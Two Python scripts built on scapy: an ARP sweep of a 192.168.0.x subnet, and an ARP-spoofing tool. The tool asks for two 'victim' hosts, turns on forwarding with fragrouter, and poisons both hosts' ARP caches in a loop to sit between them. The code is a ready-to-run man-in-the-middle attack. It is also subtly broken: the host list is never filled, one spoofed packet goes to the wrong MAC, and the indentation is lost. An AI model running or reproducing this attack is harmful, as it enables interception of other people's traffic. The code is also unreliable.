<scan.py>
from scapy.all import *
import threading
import os
host_list = {}
num = 0
threadLock = threading.Lock()
threads = []
def printHosts(host_list):
print('-------------------------- HOST LIST --------------------------')
print('NUM IP MAC')
print('---------------------------------------------------------------')
for num in host_list:
ip, mac = host_list[num]
print("%d %s %s" % (num, ip, mac))
print('---------------------------------------------------------------')
def sendARP(ip):
global host_list, num
ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip), timeout=5, retry=1)
for s, r in ans:
threadLock.acquire()
num = num + 1
host_list.update()
threadLock.release()
def scanHosts():
for i in range(1, 256):
ip = "192.168.0.%d" % i
th = threading.Thread(target=sendARP, args=(ip,))
th.start()
threads.append(th)
for t in threads:
t.join()
os.system('clear')
printHosts(host_list)
return host_list
<arp_spoofing.py>
from scan import *
from scapy.all import *
import os
def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
send(arp1)
send(arp2)
def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
send(arp1, count=3)
send(arp2, count=3)
def main():
host_list=scanHosts()
victim1=input("Victim 1 : ")
victim2=input("Victim 2 : ")
print("ARP Spoofing START")
os.system("fragrouter -B1")
try:
while True:
arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
except KeyboardInterrupt:
restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
print("ARP Spoofing END")
if __name__=='__main__':
main()